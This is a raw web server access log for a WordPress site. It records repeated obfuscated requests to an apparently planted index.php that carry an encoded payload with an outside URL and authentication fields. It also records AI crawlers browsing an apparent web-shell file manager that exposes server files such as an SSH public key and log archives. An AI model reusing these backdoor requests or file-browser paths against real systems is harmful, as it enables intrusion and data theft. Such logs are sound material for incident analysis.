107.191.43.201 - - [10/May/2026:16:12:35 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373535352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434333935352q3031623433343138396663376236386465623036303135393138613631666162222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
216.73.217.27 - - [10/May/2026:16:18:05 -0400] "GET /p/beef%2032915826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs%2Flink.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs HTTP/1.0" 200 8165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:12:55 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373537352p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434333937352q6564353063353137633431383737643038636332366539396134643134383833222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
74.7.241.42 - - [10/May/2026:16:18:26 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/antispam/also-available.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/antispam HTTP/1.0" 200 7146 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/antispam" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:18:36 -0400] "GET /p/ball%2022319825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs%2Fnav-menu.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs HTTP/1.0" 200 21713 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:19:06 -0400] "GET /p/beef%2032911826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages%2Falign-right.png&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages HTTP/1.0" 200 6641 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:13:16 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373539362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434333939362q3336636231663638313436613963376534643362306161356661313732633734222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
74.7.241.42 - - [10/May/2026:16:19:19 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/themes/twentytwentyfour/patterns/page-home-blogging.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/themes/twentytwentyfour/patterns HTTP/1.0" 200 7630 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/themes/twentytwentyfour/patterns" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [10/May/2026:16:16:36 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373739362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343139362q3535666438376333353437343463643935333134313134306137643938363562222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
216.73.217.27 - - [10/May/2026:16:19:37 -0400] "GET /p/atom%2021863817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2F.ssh%2Fid_rsa.pub&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2F.ssh HTTP/1.0" 200 7269 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.42 - - [10/May/2026:16:20:03 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/themes/twentytwentyfive/patterns/page-link-in-bio-with-tight-margins.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/themes/twentytwentyfive/patterns HTTP/1.0" 200 8021 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/themes/twentytwentyfive/patterns" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:20:08 -0400] "GET /p/ball%2022319825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs%2Fprivacy-tools.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs HTTP/1.0" 200 9327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:20:39 -0400] "GET /p/bale%2012027824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Flogs%2Faccess_ssl_log.processed.5.gz&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Flogs HTTP/1.0" 200 6622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.42 - - [10/May/2026:16:21:07 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/themes/twentytwentyfive/patterns/contact-centered-social-link.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/themes/twentytwentyfive/patterns HTTP/1.0" 200 7490 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/themes/twentytwentyfive/patterns" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:21:09 -0400] "GET /p/atom%2020343817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2FIXR%2Fclass-IXR-base64.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2FIXR HTTP/1.0" 200 6844 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:21:40 -0400] "GET /p/beef%2032911826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Fipafb%2Findex.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Fipafb HTTP/1.0" 200 10667 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:16:56 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373831362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343231362q3935306663333131623330303933626330636462636265643965343338623239222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
74.7.241.42 - - [10/May/2026:16:22:09 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/fullscreen/ie-notice.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/fullscreen HTTP/1.0" 200 7386 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/fullscreen" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:22:10 -0400] "GET /p/ball%2020363825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fembed%2Ftheme.min.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fembed HTTP/1.0" 200 6720 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:17:16 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373833362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343233362q6162306334346234356636636362343131343164633463353938336662386264222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [10/May/2026:16:17:36 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373835362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343235362q6438653762363361373666636436643832653135376538333062333634393165222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
216.73.217.27 - - [10/May/2026:16:22:41 -0400] "GET /p/atom%2021863817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fincludes%2Fplugin.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fincludes HTTP/1.0" 200 12185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:17:56 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373837362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343237362q3831333139663635663130396631343466363832333166636462313762313136222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
216.73.217.27 - - [10/May/2026:16:23:12 -0400] "GET /p/beef%2030767826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblock-patterns%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblock-patterns HTTP/1.0" 200 6735 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.42 - - [10/May/2026:16:23:15 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/fullscreen/abort-message.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/fullscreen HTTP/1.0" 200 7123 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/fullscreen" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [10/May/2026:16:18:36 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373931362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343331362q3136306335373666393531306432643737636662323137323931633236373938222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [10/May/2026:16:18:16 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373839362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343239362q3361353139353336663332356466333237366338613937303535303031356631222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
216.73.217.27 - - [10/May/2026:16:23:42 -0400] "GET /p/beef%2030695826?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2FPHPMailer HTTP/1.0" 200 7313 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.42 - - [10/May/2026:16:24:12 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/fullscreen/mobile-notice.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/fullscreen HTTP/1.0" 200 7209 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/fullscreen" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:24:13 -0400] "GET /p/atom%2021171817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss%2Fmedia.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss HTTP/1.0" 200 12100 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:18:56 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373933362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343333362q6239396633633530613964666539636434333565353231636662666136306533222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [10/May/2026:16:19:16 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373935362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343335362q3562623262306364383662363530373938323139616132313530333464623234222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
216.73.217.27 - - [10/May/2026:16:24:46 -0400] "GET /p/beef%2030475826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-mail.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs HTTP/1.0" 200 9654 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:21:57 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383131372p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343531372q3934313530373865373163326166636237396461336432333962333232616662222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [10/May/2026:16:19:36 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434373937362p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343337362q3937623431623734646331363038333738313163313064616135653939636534222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
74.7.241.42 - - [10/May/2026:16:25:03 -0400] "GET /?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder/notifications HTTP/1.0" 200 7075 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/builder" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:25:18 -0400] "GET /p/beef%2030199826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages%2Fmenu-vs-2x.png&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages HTTP/1.0" 200 6644 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:25:41 -0400] "GET /p/beef%2032915826?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Flist-item HTTP/1.0" 200 7041 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.42 - - [10/May/2026:16:25:48 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/themes/twentytwentyfour/patterns/page-newsletter-landing.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/themes/twentytwentyfour/patterns HTTP/1.0" 200 7739 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/themes/twentytwentyfour/patterns" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:26:12 -0400] "GET /p/bale%2012587824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs%2Fthickbox%2Fthickbox.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs%2Fthickbox HTTP/1.0" 200 7467 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.27 - - [10/May/2026:16:26:42 -0400] "GET /p/ball%2022963825?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fuploads%2Fssa%2Flogs HTTP/1.0" 200 7046 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.42 - - [10/May/2026:16:26:54 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/admin/dashboard/widget/settings.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/admin/dashboard/widget HTTP/1.0" 200 7341 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/templates/admin/dashboard/widget" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:27:12 -0400] "GET /p/atom%2021863817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Frest-api%2Fsearch%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Frest-api%2Fsearch HTTP/1.0" 200 6744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:22:17 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383133372p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343533372q3930366235393639323535353361663539313838346131343933303466633862222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
216.73.217.27 - - [10/May/2026:16:27:44 -0400] "GET /p/atom%2021391817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Ffeed.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 13232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:22:37 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383135372p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343535372q3865663565386666316335653434313436303063393039373264613466393437222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
74.7.241.42 - - [10/May/2026:16:27:58 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv/bootstrap.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv HTTP/1.0" 200 7486 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-content/plugins/wpforms-lite/vendor/symfony/polyfill-iconv" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.217.27 - - [10/May/2026:16:28:14 -0400] "GET /p/atom%2021171817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fclass-wp-http-response.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 7537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [10/May/2026:16:22:57 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383137372p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343537372q3837386231623963333334313536396664326362303563626532646333346636222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [10/May/2026:16:23:17 -0400] "GET /wp-admin/network/network/index.php?ARRAY=7o2230223n313737383434383139372p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383434343539372q6661346533336335663137643963333662643737323631353232613439373332222p2232223n223436383437356635326266313233313534636531346362633636373965663664222p2233223n223066316239643631313364633062616262353764633131636633333431623962222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231352q35302q35312q36372q37352q39302q3137227q HTTP/1.0" 200 4031 "-" "-"
